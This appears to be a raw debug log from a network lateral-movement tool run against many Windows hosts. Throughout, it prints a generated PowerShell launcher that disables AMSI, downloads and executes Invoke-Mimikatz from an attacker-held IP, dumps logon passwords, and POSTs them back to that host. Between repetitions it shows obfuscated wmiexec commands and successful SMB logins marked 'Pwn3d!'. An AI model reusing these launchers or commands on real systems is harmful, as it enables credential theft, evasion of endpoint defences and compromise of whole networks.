$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Target system is SRV2.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\SRV2[\\PIPE\\atsvc] | |
DEBUG StringBinding: SRV2[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:SRV2.sometarget.com[49154] | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB SRV3.sometarget.com 445 SRV3 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv nT -;sv CS ec;sv lz ((gv nT).value.toString()+(gv CS).value.toString());powershell (gv lz).value.toString() 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" | |
DEBUG Target system is SRV3.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\SRV3[\\PIPE\\atsvc] | |
DEBUG StringBinding: SRV3[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:SRV3.sometarget.com[49154] | |
DEBUG Target system is SRV7.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\SRV7[\\PIPE\\atsvc] | |
DEBUG StringBinding: SRV7[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:SRV7.sometarget.com[49154] | |
DEBUG Target system is SRV1.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\SRV1[\\PIPE\\atsvc] | |
DEBUG StringBinding: SRV1[49155] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:SRV1.sometarget.com[49155] | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) 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" | |
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode. | |
Download it from https://www.dlitz.net/software/pycrypto | |
MIMIKATZ AC51.sometarget.com 445 AC51 [+] Executed launcher | |
MIMIKATZ ACTSMPROX.sometarget.com 445 ACTSMPROX [+] Executed launcher | |
MIMIKATZ 172.23.2.72 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB TLCANISTER.sometarget.com 445 TLCANISTER [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB CDRDC01.sometarget.com 445 CDRDC01 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Target system is TLCANISTER.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\TLCANISTER[\\PIPE\\atsvc] | |
DEBUG StringBinding: tlcanister[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:TLCANISTER.sometarget.com[49154] | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB CDC01.sometarget.com 445 CDC01 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) 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" | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) 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" | |
DEBUG Target system is CDC01.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\CDC01[\\PIPE\\atsvc] | |
DEBUG StringBinding: CDC01[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:CDC01.sometarget.com[49154] | |
DEBUG Target system is CDRDC01.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\CDRDC01[\\PIPE\\atsvc] | |
DEBUG StringBinding: CDRDC01[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:CDRDC01.sometarget.com[49154] | |
MIMIKATZ CDC02.sometarget.com 445 CDC02 [+] Executed launcher | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv Pw -;sv Lt ec;sv LK ((gv Pw).value.toString()+(gv Lt).value.toString());powershell (gv LK).value.toString() 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" | |
MIMIKATZ ACDRTSM1.sometarget.com 445 ACDRTSM1 [+] Executed launcher | |
MIMIKATZ SRV2.sometarget.com 445 SRV2 [+] Executed launcher | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv Yz -;sv FG ec;sv ye ((gv Yz).value.toString()+(gv FG).value.toString());powershell (gv ye).value.toString() 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" | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv FA -;sv zp ec;sv tx ((gv FA).value.toString()+(gv zp).value.toString());powershell (gv tx).value.toString() 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" | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) 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" | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv HR -;sv WV ec;sv Wa ((gv HR).value.toString()+(gv WV).value.toString());powershell (gv Wa).value.toString() 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" | |
MIMIKATZ 172.23.2.33 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB ACTSMAD.sometarget.com 445 ACTSMAD [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
MIMIKATZ TLCANISTER.sometarget.com 445 TLCANISTER [+] Executed launcher | |
MIMIKATZ SRV3.sometarget.com 445 SRV3 [+] Executed launcher | |
MIMIKATZ SRV7.sometarget.com 445 SRV7 [+] Executed launcher | |
MIMIKATZ SRV1.sometarget.com 445 SRV1 [+] Executed launcher | |
MIMIKATZ 172.23.2.29 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB ACTSM1.sometarget.com 445 ACTSM1 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
MIMIKATZ 172.23.3.248 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode. | |
Download it from https://www.dlitz.net/software/pycrypto | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB CIVRTST02.sometarget.com 445 CIVRTST02 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode. | |
Download it from https://www.dlitz.net/software/pycrypto | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB CCOGNOS01.sometarget.com 445 CCOGNOS01 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Target system is CIVRTST02.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\CIVRTST02[\\PIPE\\atsvc] | |
DEBUG StringBinding: CIVRTST02[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:CIVRTST02.sometarget.com[49154] | |
DEBUG Target system is ACTSMAD.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\ACTSMAD[\\PIPE\\atsvc] | |
DEBUG StringBinding: ACTSMAD[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:ACTSMAD.sometarget.com[49154] | |
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode. | |
Download it from https://www.dlitz.net/software/pycrypto | |
DEBUG Target system is CCOGNOS01.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\CCOGNOS01[\\PIPE\\atsvc] | |
DEBUG StringBinding: CCognos01[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:CCOGNOS01.sometarget.com[49154] | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) 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" | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) 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" | |
MIMIKATZ 172.23.2.117 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ CDC01.sometarget.com 445 CDC01 [+] Executed launcher | |
MIMIKATZ CDRDC01.sometarget.com 445 CDRDC01 [+] Executed launcher | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB CIVRTST01.sometarget.com 445 CIVRTST01 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv Or -;sv Rx ec;sv Wb ((gv Or).value.toString()+(gv Rx).value.toString());powershell (gv Wb).value.toString() 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" | |
DEBUG Target system is ACTSM1.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\ACTSM1[\\PIPE\\atsvc] | |
DEBUG StringBinding: ACTSM1[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:ACTSM1.sometarget.com[49154] | |
MIMIKATZ 172.23.2.95 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG Target system is CIVRTST01.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\CIVRTST01[\\PIPE\\atsvc] | |
DEBUG StringBinding: CIVRTST01[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:CIVRTST01.sometarget.com[49154] | |
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode. | |
Download it from https://www.dlitz.net/software/pycrypto | |
MIMIKATZ CIVRTST02.sometarget.com 445 CIVRTST02 [+] Executed launcher | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB TLPORTAL.sometarget.com 445 TLPORTAL [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) 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" | |
MIMIKATZ 172.23.3.61 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ CCOGNOS01.sometarget.com 445 CCOGNOS01 [+] Executed launcher | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv SN -;sv HG ec;sv hZ ((gv SN).value.toString()+(gv HG).value.toString());powershell (gv hZ).value.toString() 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" | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv Cx -;sv vZ ec;sv Xf ((gv Cx).value.toString()+(gv vZ).value.toString());powershell (gv Xf).value.toString() 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" | |
DEBUG Target system is TLPORTAL.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\TLPORTAL[\\PIPE\\atsvc] | |
DEBUG StringBinding: TLPORTAL[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:TLPORTAL.sometarget.com[49154] | |
MIMIKATZ CIVRTST01.sometarget.com 445 CIVRTST01 [+] Executed launcher | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB ACCOG01.sometarget.com 445 ACCOG01 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
